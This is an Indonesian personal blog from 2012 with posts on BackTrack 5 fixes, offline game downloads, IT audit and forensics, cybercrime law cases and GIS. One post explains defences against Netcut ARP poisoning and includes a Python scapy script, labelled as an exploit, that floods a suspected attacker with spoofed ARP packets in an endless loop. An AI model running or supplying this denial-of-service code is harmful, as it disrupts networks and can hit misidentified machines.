Please Enable JavaScript Your Browser.. Thank's

Perfect World International New Horizons

Perfect World International New Horizons Version Offline dengan Server 1.5.1, terdapat 5 RAS dengan Quest terbaru, makin penasaran Silahkan Download atau Membeli pada Blog ini.. Sekian dan Terima Kasih..

Perfect World International Siren War

Perfect World Siren War Version Offline dengan Server 1.4.6, terdapat 5 RAS dengan Quest terbaru, makin penasaran Silahkan Download atau Membeli pada Blog ini.. Sekian dan Terima Kasih..

BattleField 2142 Offline

Battle 2142 Offline Full Installer, dapat bermain LAN dengan teman-teman Anda beserta BOTS (Maps yang ada BOTSnya saja)

Dragon Nest Trial Offline

Dragon Nest Offline Ini belum ada yang full Version masih Trial Version..

Perfect World International Rising Tide

Perfect World International Rising Tide Version Offline dengan Server 1.3.6, dengan 3 RAS, sudah banyak perbaikan baik game maupun Web Localhostnya, penasaran silahkan Download.. Sekian dan Terima Kasih..

Selasa, 02 Oktober 2012

TroubleShooting Backtrack 5

Ini berdasarkan pengalaman saya sendiri menggunakan Backtrack 5 dan sebagai Summary, banyak kendala yang dihadapi seorang user saat pertama kali penggunaan OS ini, diantaranya sebagai berikut:

Sebelum itu edit dulu Repositorynya dengan Terminal ketikan: gedit /etc/apt/sources.list
Kemudian Copy-Paste Repository Lokal dibawah ini:
# deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
# deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
# deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

deb http://kambing.ui.ac.id/ubuntu lucid main restricted universe multiverse
deb http://kambing.ui.ac.id/ubuntu lucid-updates main restricted universe multiverse
deb http://kambing.ui.ac.id/ubuntu lucid-security main restricted universe multiverse
deb http://kambing.ui.ac.id/ubuntu lucid-backports main restricted universe multiverse
deb http://kambing.ui.ac.id/ubuntu lucid-proposed main restricted universe multiverse

Kemudian Ketikkan pada Terminal : apt-get update

1. Masalah Wireless dengan penggunaan WICD, Wifi terdeteksi tapi tidak bisa Terkoneksi:
Ketikan pada terminal:
dpkg-reconfigure wicd

Tunggu Proses selesai lalu ketik kembali:
update-rc.d wicd defaults

2. Pengaturan Sound tidak berfungsi:
Klik pada Menu - System - Preference - Startup Applications - Add
Nama : PulseAudio
Command : /usr/bin/pulseaudio
Comment : Sound Fix Backtrack 5
Selesai Lalu Reboot PC/Laptop.

3. Cara Mengganti Icon Backtrack (Dragoon) menjadi Icon Ubuntu biasa:
Ketik pada terminal: apt-get install python-software-properties
Kemudian : add-apt-repository ppa:webupd8team/y-ppa-manager
Kemudian : add-apt-repository ppa:tiheum/equinox
Kemudian : apt-get update
Kemudian : apt-get install faenza-icon-theme
Cara mengganti:
Klik kanan - Change Desktop Background - Theme - Dust Sand

4.Cara memainkan Music atau Video:
Ketikan pada Terminal:apt-get install vlc
Kemudian ketikan: hexedit/usr/bin/vlc
Setelah masuk ke dalam editor:
*. Tekan tab
*. ctrl + s for strings
*. ketik geteuid dan ganti string tersebut dengan getppid
*. disimpan dengan ctrl + x

5. Fixing Splash Screen:
Ketikan pada Terminal : fix splash

6. Mengganti Splash Screen:
Ketikan pada terminal: apt-get install plymouth-theme-*
Kemudian: update-alternatives --config default.plymouth
Pilih dari 1-12
Kemudian: update-initramfs -u
perintah tersebut untuk save configurasinya.

Selasa, 03 Juli 2012

Cara Bermain Rubik 3x3

Waduh banyak ternyata Tutorial di Youtube tentang Rubik, share aja tutorial yang enak dari Indonesia Only yang udah lama sekitar diupload tahun 2009, Langkah Pertama Bermain Rubik By Youtube:


Langkah Kedua Bermain Rubik By Youtube:

Langkah Ketiga Bermain Rubik By Youtube:

Jumat, 29 Juni 2012

Impian Menjadi Programer IT

Banyak syarat yang harus diketahui untuk itu semua, namun syarat-syarat yang harus dipenuhi sebenarnya mudah-mudah tapi juga susah, butuh kesabaran dan keuletan dari diri sendiri, mau terus belajar tanpa rasa malas dan jenuh.

Banyak dari teman-teman saya yang jenuh dengan proses menjadi seorang dapat dibilang ahli komputer, ahli Sistem Informasi, dan ahli dibidang yang berbau dunia Teknologi Informasi.

Proses tersebut diantaranya:
1. Mengikuti Perkuliahan sesuai dengan matakuliah yang berkaitan dengan IT
2. Mempelajari bahasa pemograman, seperti: PHP, Visual Basic.Net, Visual Basic, C++, C++.Net dan lain sebagainya.
3. Menaati aturan dan peraturan yang dinasehati oleh pengajar yang mengajari kita tentang pemograman.

Hal yang bersangkutan dengan Peraturan, apabila dilanggar, dapat menguntungkan kita namun disisi hal lain orang lain yang kita rugikan.

Contoh hal yang menguntungkan diri sendiri dan merugikan orang lain pada sisi kita menjadi seorang programer suatu bank:

Misal kita menjadi seorang programer dan dapat pekerjaan menjadi seorang programer yang membuat suatu aplikasi untuk Bank tersebut, bisa saja "Kita" seorang programer memasukkan source code yang dapat mencuri uang dan data nasabah saat melakukan transaksi sebesar, misal mencuri secara diam-diam dengan aplikasi yang kita buat dan terpasang pada ATM bank tertentu dengan aplikasi yang telah "Kita buat Rp.500-/penarikan, misal di atm. tanpa tercatat pada saat pencetakan buku rekening nasabah. Dengan demikian contoh kasus tersebut terdapat kecurangan dimana sisi nasabah tidak tahu bagaimana proses uang tersebut sebesar nominal yang dicuri.

PROSEDUR PENDIRIAN BADAN USAHA DI BIDANG IT

Dalam hal mendirikan suatu usaha pada bidang Teknologi Informasi, ada hal yang harus diperhatikan diantaranya, syarat-syarat yang harus dipenuhi diantaranya sebagai berikut:

A.    Syarat Mendirikan Usaha
1.    modal yang di miliki
2.    dokumen perizinan
3.    para pemegang saham
4.    tujuan usaha
5.    jenis usaha

B.    Tahapan Perizinan Badan Usaha
1.    Surat Izin Tempat Usaha (SITU)
2.    Surat Izin Usaha Perdagangan (SIUP)
3.    Nomor Pokok Wajib Pajak (NPWP)
4.    Nomor Register Perusahaan (NRP)
5.    Nomor Rekening Bank (NRB)
6.    Analisa Mengenai Dampak Lingkungan (AMDAL)
7.    Surat izin lainnya yang terkait dengan pendirian usaha, sepertii izin prinsip, izin penggunaan tanah, izin mendirikan bangunan (IMB), dan izin gangguan.
Dalam membangun sebuah badan usaha, kita harus memperhatikan beberapa prosedur peraturan perizinan, sebagai berikut :

1. Tahapan pengurusan izin pendirian
Beberapa dokument yang harus diperhatikan untuk mengurus surat perizinan untuk pendirian:
• Tanda Daftar Perusahaan (TDP);
• Nomor Pokok Wajib Pajak (NPWP);
• Bukti diri.

Adapun beberapa surat perizinan yang harus dipenuhi selain point-point yang diatas, diantaranya:
• Surat Izin Usaha Perdagangan (SIUP), diperoleh melalui Dep. Perdagangan.
• Surat Izin Usaha Industri (SIUI), diperoleh melalui Dep. Perindustrian.
• Izin Domisili.
• Izin Gangguan.
• Izin Mendirikan Bangunan (IMB).
• Izin dari Departemen Teknis

2. Tahapan pengesahan menjadi badan hukum
Harus adanya pengakuan badan hukum bisa didasarkan pada Kitab Undang-Undang Hukum Dagang (KUHD), hingga Undang-Undang Penanaman Modal Asing ( UU PMA ).

3. Tahapan penggolongan menurut bidang yang dijalani.
Badan usaha dikelompokkan kedalam berbagai jenis berdasarkan jenis bidang kegiatan yang dijalani. Berkaitan dengan bidang tersebut, maka setiap pengurusan izin disesuaikan dengan departemen yang membawahinya seperti kehutanan, pertambangan, perdagangan, pertanian.

4. Tahapan mendapatkan pengakuan, pengesahan dan izin dari departemen lain
yang terkait Departemen tertentu yang berhubungan langsung dengan jenis kegiatan badan usaha akan mengeluarkan izin. Namun diluar itu, badan usaha juga harus mendapatkan izin dari departemen lain yang pada nantinya akan bersinggungan dengan operasional badan usaha misalnya Departemen Perdagangan mengeluarkan izin pendirian industri pembuatan obat berupa SIUP. Maka sebgai kelanjutannya, kegiatan ini harus mendapatkan sertifikasi juga dari BP POM, Izin Gangguan atau HO dari Dinas Perizinan, Izin Reklame dan sebagainya.
• Tugas dan lingkup pekerjaan
• Tanggal mulai dan berakhirnya pekerjaan
• Harga borongan pekerjaan
sumber :
http://bigswamp.wordpress.com/2011/04/15/prosedur-pendirian-badan-usaha-di-bidang-it/
http://wiendy89.blogspot.com/2012/05/prosedur-pendirian-badan-usaha-di.html

Rabu, 27 Juni 2012

Perfect World Offline Server + Client 1.3.6

Perfect World Offline Server + Client 1.3.6 SELESAI REPAIR..
OLD PERFECT WORLD SERVER 1.3.6 + CLIENTSIDE

1. File Server Changelogs Full Speed From Premium 4Shared: (Link ada yang rusak jangan di download masih dalam perbaikan)
PART 1 PART 2 PART 3
PART 4 PART 5 PART 6

2. File Client+Patch Changelogs Full Speed From Premium 4Shared:
Part 1 Part 2 Part 3
 
(TIDAK DIWAJIBKAN UNTUK DI DOWNLOAD ^,^) Patch Client 1.3.6 Akatsuki10: From 4shared

3. Sedia Teh Tubruk Anget sama Pisang goreng.. Nyumy.. sambil maen... ^,^

4. Kelupaan Kalo ada yang bertanya error import itu karena versi virtualboxnya harus yang Versi VirtualBox 4.2.14-86644 (Cari di google pasti ketemu)



JIKA ADA YANG BERTANYA TENTANG TUTORIAL DISINI SAYA BUAT VIDEO JELAS DENGAN NOTEPAD DI DALAM VIDEO, JIKA KURANG JELAS VIDEONYA RUBAH SETTINGAN KE 480p KUALITAS VIDEONYA..

Preview Server-Client:

Vbox Setting:


Sabtu, 23 Juni 2012

Gunbound Offline Thor Hammer


Gunbound Thor Hammer untuk saat ini sudah saya edit menjadi versi 471, karena sebelumnya file saya dihapus oleh .....(tidak perlu disebutkan ya Bos.. hehe..)  untuk proses Repair Link sudah selesai silahkan di Download....

Preview Gunbound Thor Hammer Offline:

Senin, 30 April 2012

Auditor dan Forensik Teknologi Informasi

Secara umum Audit IT adalah suatu proses kontrol pengujian terhadap infrastruktur teknologi informasi dimana berhubungan dengan masalah audit finansial dan audit internal. Audit IT lebih dikenal dengan istilah EDP Auditing (Electronic Data Processing), biasanya digunakan untuk menguraikan dua jenis aktifitas yang berkaitan dengan komputer. Salah satu penggunaan istilah tersebut adalah untuk menjelaskan proses penelahan dan evaluasi pengendalian-pengendalian internal dalam EDP. Jenis aktivitas ini disebut sebagai auditing melalui komputer. Penggunaan istilah lainnya adalah untuk menjelaskan pemanfaatan komputer oleh auditor untuk melaksanakan beberapa pekerjaan audit yang tidak dapat dilakukan secara manual. Jenis aktivitas ini disebut audit dengan komputer.

Audit IT sendiri merupakan gabungan dari berbagai macam ilmu, antara lain Traditional Audit, Manajemen Sistem Informasi, Sistem Informasi Akuntansi, Ilmu Komputer, dan Behavioral Science.

Audit IT bertujuan untuk meninjau dan mengevaluasi faktor-faktor ketersediaan (availability), kerahasiaan (confidentiality), dan keutuhan (integrity) dari sistem informasi organisasi.

Dari segi teknis spesifikasi dapat dilihat dari:

1. Sistem dan aplikasi.
Audit yang berfungsi untuk memeriksa apakah sistem dan aplikasi sesuai dengan kebutuhan organisasi, berdayaguna, dan memiliki kontrol yang cukup baik untuk menjamin keabsahan, kehandalan, tepat waktu, dan keamanan pada input, proses, output pada semua tingkat kegiatan sistem.
2. Fasilitas pemrosesan informasi.
Audit yang berfungsi untuk memeriksa apakah fasilitas pemrosesan terkendali untuk menjamin ketepatan waktu, ketelitian, dan pemrosesan aplikasi yang efisien dalam keadaan normal dan buruk.
3. Pengembangan sistem.
Audit yang berfungsi untuk memeriksa apakah sistem yang dikembangkan mencakup kebutuhan obyektif organisasi.
4. Arsitektur perusahaan dan manajemen TI.
Audit yang berfungsi untuk memeriksa apakah manajemen TI dapat mengembangkan struktur organisasi dan prosedur yang menjamin kontrol dan lingkungan yang berdaya guna untuk pemrosesan informasi.
5. Client/Server, telekomunikasi, intranet, dan ekstranet.
Suatu audit yang berfungsi untuk memeriksa apakah kontrol-kontrol berfungsi pada client, server, dan jaringan yang menghubungkan client dan server.

Pada tingkat kemampuan Audit IT harus memiliki diantaranya:
1. Tahapan Perencanaan.
Sebagai suatu pendahuluan mutlak perlu dilakukan agar auditor mengenal benar obyek yang akan diperiksa sehingga menghasilkan suatu program audit yang didesain sedemikian rupa agar pelaksanaannya akan berjalan efektif dan efisien.
2. Mengidentifikasikan resiko dan kendali.
Untuk memastikan bahwa qualified resource sudah dimiliki, dalam hal ini aspek SDM yang berpengalaman dan juga referensi praktik-praktik terbaik.
3. Mengevaluasi kendali dan mengumpulkan bukti-bukti.
Melalui berbagai teknik termasuk survei, interview, observasi, dan review dokumentasi.
4. Mendokumentasikan.
Mengumpulkan temuan-temuan dan mengidentifikasikan dengan auditee.
5. Menyusun laporan.
Mencakup tujuan pemeriksaan, sifat, dan kedalaman pemeriksaan yang dilakukan.

Sumber: http://www.scribd.com/doc/13263189/Audit-Sistem-Informasi

Mengenai suatu forensik dalam IT yaitu diantaranya mempunyai sebuah definisi serta tujuan dan Terminlogi forensik itu sendiri:


* Definisi sederhana, yaitu penggunaan sekumpulan prosedur untuk melakukan pengujian secara menyeluruh suatu sistem komputer dengan mempergunakan software dan tool untuk memelihara barang bukti tindakan kriminal.

Tujuan dari IT yaitu mengamankan dan menganalisa bukti digital. Dari data yang diperoleh melalui survey oleh FBI dan The Computer Security Institute, pada tahun 1999 mengatakan bahwa 51% responden mengakui bahwa mereka telah menderita kerugian terutama dalam bidang finansial akibat kejahatan komputer. Kejahatan Komputer dibagi menjadi dua, yaitu :
1. Komputer fraud.
Kejahatan atau pelanggaran dari segi sistem organisasi komputer.
2. Komputer crime.
Merupakan kegiatan berbahaya dimana menggunakan media komputer dalam melakukan pelanggaran hukum.

* Terminologi IT Forensik diantaranya:
A. Bukti digital (digital evidence).
adalah informasi yang didapat dalam bentuk atau format digital, contohnya e-mail.

B. Empat elemen kunci forensik dalam teknologi informasi, antara lain :

1. Identifikasi dari bukti digital.
Merupakan tahapan paling awal forensik dalam teknologi informasi. Pada tahapan ini dilakukan identifikasi dimana bukti itu berada, dimana bukti itu disimpan dan bagaimana penyimpanannya untuk mempermudah tahapan selanjutnya.

2. Penyimpanan bukti digital.
Termasuk tahapan yang paling kritis dalam forensik. Bukti digital dapat saja hilang karena penyimpanannya yang kurang baik.
3. Analisa bukti digital.

Pengambilan, pemrosesan, dan interpretasi dari bukti digital merupakan bagian penting dalam analisa bukti digital.

4. Presentasi bukti digital.
Proses persidangan dimana bukti digital akan diuji dengan kasus yang ada. Presentasi disini berupa penunjukkan bukti digital yang berhubungan dengan kasus yang disidangkan.

Investigasi kasus teknologi informasi.
1. Prosedur forensik yang umum digunakan, antara lain :

a. Membuat copies dari keseluruhan log data, file, dan lain-lain yang dianggap perlu pada suatu media yang terpisah.

b. Membuat copies secara matematis.

c. Dokumentasi yang baik dari segala sesuatu yang dikerjakan.

2. Bukti yang digunakan dalam IT Forensics berupa :
a. Harddisk.
b. Floopy disk atau media lain yang bersifat removeable.
c. Network system.

3. Beberapa metode yang umum digunakan untuk forensik pada komputer ada dua yaitu :

a. Search dan seizure.
Dimulai dari perumusan suatu rencana.

b. Pencarian informasi (discovery information).
Metode pencarian informasi yang dilakukan oleh investigator merupakn pencarian bukti tambahan dengan mengandalkan saksi baik secara langsung maupun tidak langsung terlibat dengan kasus ini

Kamis, 26 April 2012

Anti Netcut Version Windows XP, Vista & 7

Untuk Windows XP:
* Masuk ke Command Prompt (cmd) lalu ketik:

arp -s 192.168.6.1 00-00-cd-0c-7b-ae

Untuk Windows 7:
* Ketik cmd klik kanan run as administrator, ketikin:

netsh interface ipv4 add neighbors "Wireless Network Connection" 192.168.6.1 00-00-cd-0c-7b-ae

*Note: "Wireless Network Connection" liat name Network Wirelessnya di Network adapter

Catetan tambahan:

 Ip: 192.168.6.1 adalah IP gateway yang saya gunakan

Mac Gateway: 00-00-cd-0c-7b-ae adalah alamat sebuah gateway untuk koneksi internet

Sudah dibahas sebelumnya tentang pembahasan Net Cut.

Install WICD di Ubuntu (Trouble Connection)

Masalah yang sederhana dan sudah saya tes di Ubuntu yang gunain WICD biasanya waktu koneksi ke wifi mental alias tidak ada response dari Router wifinya, ikutin cara dibawah ini semoga aja berhasil, karena harusnya berhasil saya sudah mencobanya:
1. Buka terminal lalu:
dpkg-reconfigure wicd
update-rc.d wicd defaults
2. Restart Laptop/PC.

Kamis, 12 April 2012

Counter Attack Net Cut

Disini saya menggunakan Backtrack 5 yang sudah kumplit aplikasi untuk yang aneh-aneh... mungkin pengunjung sudah tidak aneh lagi mendengar Operating Sistem ini yang termasuk distro Ubuntu 10.04 version Gnome, Nah sekarang saya membahas sedikit tentang Konsep Net Cut dan cara menangkal ataupun membalas agar Komputer si Net Cut Over memory di RAMnya:

1. Net Cut:

Net cut menurut konsep pemahaman saya dari banyak literatur video, searching maupun buku, mengatakan bahwa Net Cut menggunakan konsep ARP-Poisoning, dimana Mac Gateway si Komputer Korban agar berbeda dengan gateway defaultnya.

Misal:

Gateway Internet Asli:

192.168.6.1 dengan Mac: 00:00:cd:0c:7b:ae

Kompi Korban awalnya:

192.168.6.20 dengan Mac 00:26:82:22:ae:oc dan Mac Gateway: 00:00:cd:0c:7b:ae

Kompi Penjahat mencoba racuni Kompi Korban:

Penjahat: 192.168.6.21 dengan Mac 48:af:28:11:ae:cd dan Mac Gateway 00:00:cd:0c:7b:ae

Kompi Korban saat terinfeksi oleh Kompi si Penjahat:

192.168.6.20 dengan Mac 00:26:82:22:ae:oc dan Mac Gateway milik penjahat ataupun random: 48:af:28:11:ae:cd ---> berbeda dengan Gateway Defaultnya yang: 00:00:cd:0c:7b:ae

2. Arpon

Untuk aplikasi yang satu ini biasanya (saya) gunakan di Backtrack 5 ataupun distro linux ubuntu pada umumnya dengan cara menginstall lewat terminal dengan server lokal ataupun luar:

Catetan kalo selain Backtrack gunakan perintah sudo untuk mengeksekusi sebagai root.

apt-get install arpon

Setelah terinstal kita setting lagi sedikit agar dapat berjalan:

1. gedit /etc/arpon.sarpi

Tambahkan IP dan Mac Gateway (Sebelum terinfeksi) tanpa tanda pagar karena tanda # untuk komentar

Misal:
#IP_Gateway
192.168.6.1 00:00:cd:0c:7b:ae

Lalu save

2. gedit /etc/default/arpon

Lihat script dibawah:

# For SARPI uncomment the following line
#DAEMON_OPTS="-d -f /var/log/arpon/arpon.log -g -s"

# For DARPI uncomment the following line
#DAEMON_OPTS="-d -f /var/log/arpon/arpon.log -g -y"

# Modify to RUN="yes" when you are ready
RUN="no"

Rubah jika Mode Static Hilangkan tanda # Daemon untuk SARPI jika tipe Dynamic hilangkan tanda # Daemon untuk DARPI.

Menjalankan arpon:

Lihat dahulu mode apa yang digunakan (Interface)
1. Eth = LAN
2. Wlan = Wireless

Contoh saya menggunakan interface Wlan0:

arpon -i wlan0 -y

(catetan: saya terkoneksi dengan tipe dynamic Mode DARPI jadi menggunakan perintah akhir -y apabila menggunakan SARPI tinggal rubah perintah akhir dengan -s)

3. Anti Net-Cut 2.0:
#!/usr/bin/env python
#Exploit Title: Netcut Denial of Service Vulnerability
#Version: Netcut 2
#Tested on: Windows Xp, Windows 7

from scapy.all import sniff, Ether, ARP, RandIP, RandMAC, Padding, sendp, conf
import commands, os, sys

#gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2]
gw_ip = commands.getoutput("ip route list | grep default").split()[2]
    
def protect(gw_ip, gw_mac):
    os.popen("arp -s %s %s" % (gw_ip, gw_mac))
    print "Protected From Terrorist"
    
def detect():
        ans = sniff(filter='arp', timeout=7)
        target = []
        for r in ans.res:
            target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%"))
        return target

def preattack(gw_ip):
    flag = 0
    num = []
    count = 0
    target = 0
    temp = 0
    print "Searching Terrorist..."
    d = detect()
    for i in range(len(d)):
        if d[i].split()[0] == "255.255.255.255":
            num.append(d.count(d[i]))
            if d.count(d[i]) > count:
                count = d.count(d[i])
                target = i
        if d[i].split()[0] == gw_ip:
            temp += 1
    if len(d) < 7:
        print "[-] No One Terrorist..."
        exit()
    if len(num) * 7 < temp:
        num[:] = []
        count = 0
        result = float(temp) / len(d) * 100
        for j in range(len(d)):
            if d[j].split()[0] == gw_ip:
                if d.count(d[j]) > count:
                    count = d.count(d[j])
                    target = j
            result = float(temp) / len(d) * 100
        flag = 1
    else:
        num.reverse()
        result = float(num[0] + temp) / len(d) * 100
    print "There is a possibility that " + str(result) + "%"
    if result >= 50:
        target_mac = d[target].split()[1]
        target_ip = d[target].split()[2]
        print "[+] Detected Terrorist Location Protocol Cyber %s MAC %s" % (target_ip, target_mac)
        if flag == 0:
            attack(target_mac, target_ip, gw_ip)
        else:
            print "[-] Can't Attack"
    else:
        print "[-] No one Terrorist or try again"

def attack(target_mac, target_ip, gw_ip):
    print "[+] Counter Attack of Fire in The Hole !!!"
    e = Ether(dst="FF:FF:FF:FF:FF:FF")
    while 1:
        a = ARP(psrc=RandIP(), pdst=RandIP(), hwsrc=RandMAC(), hwdst=RandMAC(), op=1)
        p = e / a / Padding("\x00"*18)
        sendp(p, verbose=0)
        a1 = ARP(psrc=gw_ip, pdst=target_ip, hwsrc=RandMAC(), hwdst=target_mac, op=2)
        p1 = e / a1 / Padding("\x00"*18)
        sendp(p1, verbose=0)
        
if __name__ == '__main__':
    os.system("clear")  
    if len(sys.argv) == 2 or len(sys.argv) == 3:
        if len(sys.argv) == 2:
            conf.iface = sys.argv[1]
            preattack(gw_ip)
        if len(sys.argv) == 3:
            conf.iface = sys.argv[1]
            gw_mac = sys.argv[2]
            protect(gw_ip, gw_mac)
            preattack(gw_ip)
    else:
        print '''Mode:
1.)Attack only Terroris
Usage: NetcutKiller
Example: NetcutKiller.py wlan0
2.)Attack with protect himself From Terroris
Usage: NetcutKiller
Example: NetcutKiller.py wlan0 00:FA:77:AA:BC:AF
''' 

Simpan misal Pembalasan_Netcut.py simpan di root (home)

(Catetan: bahasa yang digunakan menggunakan bahasa pemograman python jadi ekstensi akhir berikan .py)

Lalu untuk menjalankannya Lewat terminal:

python Pembalasan_Netcut.py

Lalu akan muncul pilihan.

Have Fun ^^.. mohon maaf apablia ada yang kurang dalam tutorial ini.

Rabu, 11 April 2012

Contoh Pelanggaran Teknologi Informasi

1. Data Forgery

Kejahatan jenis ini dilakukan dengan tujuan memalsukan data pada dokumen-dokumen penting yang ada di internet. Dokumen-dokumen ini biasanya dimiliki oleh institusi atau lembaga yang memiliki situs berbasis web database.

Contoh Kasus :

Data Forgery Pada E-Banking BCA

Dunia perbankan melalui Internet (e-banking) Indonesia, dikejutkan oleh ulah seseorang bernama Steven Haryanto, seorang hacker dan jurnalis pada majalah Master Web. Lelaki asal Bandung ini dengan sengaja membuat situs asli tapi palsu layanan Internet banking Bank Central Asia, (BCA). Steven membeli domain-domain dengan nama mirip www.klikbca.com (situs asli Internet banking BCA), yaitu domain www.klik-bca.com,www.kilkbca.com, www.clikbca.com, www.klickca.com. Dan www.klikbac.com. Isi situs-situs plesetan inipun nyaris sama, kecuali tidak adanya security untuk bertransaksi dan adanya formulir akses (login form) palsu. Jika nasabah BCA salah mengetik situs BCA asli maka nasabah tersebut masuk perangkap situs plesetan yang dibuat oleh Steven sehingga identitas pengguna (user id) dan nomor identitas personal (PIN) dapat di ketahuinya.

Undang-Undang :

Pasal 23 (2): Pemilikan dan penggunaan nama domain sebagaimana dimaksud dalam ayat (1) wajib didasarkan pada itikad baik, tidak melanggar prinsip persaingan usaha secara sehat, dan tidak melanggar hak orang lain. (Tindak pidana sebagaimana dimaksud dalam ayat (1) hanya dapat dituntut atas pengaduan dari orang yang terkena tindak pidana) ( Pidana enam bulan atau denda Rp 100 juta)

Pasal 27 (2): Setiap orang dilarang menggunakan dan atau mengakses komputer dan atau sistem elektronik dengan cara apapun tanpa hak, untuk memperoleh, mengubah, merusak, atau menghilangkan informasi milik pemerintah yang karena statusnya harus dirahasiakan atau dilindungi.( Pidana 20 tahun dan denda Rp 10 miliar).

2. Cyber Espionage, Sabotage, and Extortion

Cyber Espionage merupakan kejahatan yang memanfaatkan jaringan internet untuk melakukan kegiatan mata-mata terhadap pihak lain, dengan memasuki sistem jaringan komputer pihak sasaran. Sabotage and Extortion merupakan jenis kejahatan yang dilakukan dengan membuat gangguan, perusakan atau penghancuran terhadap suatu data, program komputer atau sistem jaringan komputer yang terhubung dengan internet.

Contoh Kasus :

munculnya “sendmail worm” (sekitar tahun 1988) yang menghentikan sistem email Internet kala itu. Kemudian dibentuk sebuah Computer Emergency Response Team (CERT). Semenjak itu di negara lain mulai juga dibentuk CERT untuk menjadi point of contact bagi orang untuk melaporkan masalah kemanan. IDCERT merupakan CERT Indonesia.

Undang-undang :

Pasal 27 (1): Setiap orang dilarang menggunakan dan atau mengakses komputer dan atau sistem elektronik dengan cara apapun tanpa hak, untuk memperoleh, mengubah, merusak, atau menghilangkan informasi dalam komputer dan atau sistem elektronik. (Pidana empat tahun penjara dan denda Rp 1 miliar).

3. Cyberstalking

Kejahatan jenis ini dilakukan untuk mengganggu atau melecehkan seseorang dengan memanfaatkan komputer, misalnya menggunakan e-mail dan dilakukan berulang-ulang. Kejahatan tersebut menyerupai teror yang ditujukan kepada seseorang dengan memanfaatkan media internet. Hal itu bisa terjadi karena kemudahan dalam membuat email dengan alamat tertentu tanpa harus menyertakan identitas diri yang sebenarnya.

Contoh Kasus :

Misalnya e-mail yang berisi ajakan bergabung dengan suatu website,

email yang berisi ajakan untuk membeli produk tertentu,

mail yang berisi kontes / undian berhadiah, misalnya dengan subject

“YOU HAVE WON $1,000,000″ , “LOTTERY NATIONAL UK” , “FREE LOTTO INTERNATIONAL” , “YOU WON YAHOO LOTTO PROMOTION $1,000″,

“EASY MONEY” ,”WIN CASH ONLINE” ,”FREE JACKPOT” , dan sekarang makin gencar menawarkan produk

paket Adobe Suite yang dilengkapi dengan attachment pdf.

Undang-undang :

Pasal 25: Penggunaan setiap informasi melalui media elektronik yang menyangkut data tentang hak pribadi seseorang harus dilakukan atas persetujuan dari orang yang bersangkutan, kecuali ditentukan lain oleh peraturan perundang-undangan.

Sumber: http://niaas8.wordpress.com/2012/04/05/maraknya-kejahatan-didunia-maya/

Jumat, 30 Maret 2012

Pengembangan GIS

Contoh Webgis open source yang bisa dikembangkan secara online, yaitu pada situs ini


Contoh saat situs tersebut diakses.

Lalu dibawah ini tampilan saat masuk ke halaman situs tersebut:


Beberapa website yang dapat di download scriptnya untuk membuat webgis:

3map

Amein!

ArcView APR Parser

AutoREALM

AVCE00

AVPython

http://www.geomajas.org/

http://ominiverdi.org/

Lalu untuk licence alias berbayar

autodesk mapguide

arcgis server


Sumber: wisu28.wordpress.com

Aplikasi GIS dalam bidang kesehatan

GIS pada bidang kesehatan adalah analisis hubungan antara lingkungan hidup manusia dengan penyakit, gizi dan system pelayanan kesehatan untuk menjelaskan hubungan timbal baliknya dalam ruang. GIS pada bidang kesehatan juga bagian dari geografi manusia yang berhubungan dengan aspek – aspek geografi dari (status) kesehatan dan (system) pelayanan kesehatan.


Dalam kajian geografi kesehatan mengidentifikasi hubungan antar tiga komponen terkait dengan geografi penyakit, geografi pelayanan kesehatan dan geografi ilmu gizi, dengan analisis pada skala regional untuk pengintegarsian ketiga pendekatan itu. Namun dalam geografi kesehatan, ada 2 sub disiplin yang berkembang pesat yaitu geografi penyakit dan geografi pelayanan kesehatan.

Geografi penyakit meliputi ekplorasi, deskripsi dan pemodelan ruang waktu atas kejadian penyakit, berkaitan dengan persoalan lingkungan, deteksi dan analisis cluster dan pada pola penyebaran penyakit, analisis sebab – akibat dan rumusan hipotesis – hipotesis baru mengenai penyebab penyakit. Geografi penyakit berperan penting dalam surveillance, intervensi kesehatan, dan strategi pencegahan penyakit. Contohnya mengenai penyebaran penyakit pada suatu daerah dan apakah ada pengaruhnya dari kondisi daerah tersebut, TB, Polio, dan untuk penyakit lainnya.
Geografi system pelayanan kesehatan, berkaitan dengan perencanaan, manajemen dan jaminan pelayanan agar sesuai kebutuhan, merumuskan kebutuhan kesehatan masyarakat yang dilayani dan pola wilayah yang dilayani oleh pegawai kesehatan. Riset geografi atas pelayanan kesehatan dapat mengidentifikasi ketimpangan dalam pelayanan kesehatan antara wilayah satu dan yang lain dan alokasi sumber daya yang terbatas. Sebagai contoh mengalokasikan tenaga ke daerah – daerah yang membutuhkan dan membantu penempatan fasilitas kesehatan yang baru dan perluasan yang telah ada.
Analisa spasial terhadap penyakit merupakan sarana penting dalam penyelidikan epidemiologi. Sarana ini membantu untuk menyelidiki aetologi penyakit atau bahaya lingkungan. Salah satu contoh Analisis spasial terhadap water borne disease dilakukan dangendrof seorang kebagsaan jerman di kota Rhine-Berg dimana beliu melakukan analisis pola spasial penyakit diare dan kaitanya dengan persediaan air di kota Rhine-berg – jerman.Penelitiannya menemukan bahwa bagian pusat dan selatan wilayah kota terdapat banyak kasus daripada daerah bagian utara. Dari hasil ini beliau juga menemukan hubungan signifikan secara statistic antara timbulnya gastroenteritis dan jumlah orang yang memiliki persedian air dari tanah. Disamping hal tersebut terdapat factor penggangu yaitu pergerakan populasi, jumlah dokter di setiap daerah dan sumur pribadi. Dari contoh penggunaan GIS di atas, baik yang dilakukan oleh peneliti – peneliti di luar negeri maupun di dalam negeri. Kita bisa simpulkan bahwa GIS sangat membantu dalam bidang pekerjaan kita.

Sumber: http://www.dinkes-tts.web.id/component/content/article/38-artikel-/99-gis-pada-bidang-kesehatan.html

MapObject dan ArcObject

Arcobject adalah salah satu tools utama keluaran ersi untuk membantu membangun suatu aplikasi gis, Arcobject lebih abstract dari pada arcgis tersebut dan arc object akan terinstall secara otomatis ketika anda menginstall salah satu dari Arcgis desktop, Arcgis engine dan Arcgis server

Mapobject adalah sebuah third party komponen yang bisa digunakan di visual basic, visual C++, Delphi dan lainnya, agar bisa menampilkan peta beserta navigasinya, dan fungsi-fungsi peta lainnya, dan dapat dengan fleksibel digabungkan dalam aplikasi lainnya

Fungsi

Arcobject berfungsi sebagai alat bantu untuk membangun suatu aplikasi gis bukan berupa bahasa pemprograman

